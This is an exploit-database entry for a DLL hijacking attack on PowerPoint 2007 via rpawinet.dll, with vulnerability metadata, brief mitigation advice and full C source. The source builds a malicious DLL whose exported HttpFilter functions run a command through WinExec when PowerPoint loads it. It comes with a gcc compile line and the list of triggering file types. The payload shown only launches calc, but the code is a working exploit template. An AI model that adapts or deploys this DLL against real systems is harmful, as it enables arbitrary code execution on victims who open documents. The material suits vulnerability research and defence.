Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll)

vendor:

Microsoft Office PowerPoint 2007

by:

storm

7.5

CVSS

HIGH

DLL Hijacking

DLL Injection

CWE

Product Name: Microsoft Office PowerPoint 2007

Affected Version From: 2007 (12.0.6535.5002) SP2

Affected Version To: 2007 (12.0.6535.5002) SP2

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows Vista SP2

2010

Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll)

This exploit allows an attacker to hijack the DLL in Microsoft Office PowerPoint 2007, specifically the rpawinet.dll. By executing a malicious PowerPoint file (.odp, .pothtml, .potm, .potx, .ppa, .ppam, .pps, .ppt, .ppthtml, .pptm, .pptxml, .pwz, .sldm, .sldx, and .thmx files), the attacker can execute arbitrary code, in this case, launching the calculator.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Microsoft Office PowerPoint 2007 or apply the necessary security patches. It is also advised to exercise caution when opening PowerPoint files from untrusted sources.

Source

Exploit-DB raw data:

/*

Exploit Title: Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Version: 2007 (12.0.6535.5002) SP2
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o rpawinet.dll PowerPoint-DLL.c

.odp, .pothtml, .potm, .potx, .ppa, .ppam, .pps, .ppt, .ppthtml, .pptm, .pptxml, .pwz, .sldm, .sldx, and .thmx files are affected.

*/

#include <windows.h>
#define DllExport __declspec (dllexport)

DllExport void HttpFilterBeginningTransaction() { hax(); }
DllExport void HttpFilterClose() { hax(); }
DllExport void HttpFilterOnBlockingOps() { hax(); }
DllExport void HttpFilterOnResponse() { hax(); }
DllExport void HttpFilterOnTransactionComplete() { hax(); }
DllExport void HttpFilterOpen() { hax(); }

int hax()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}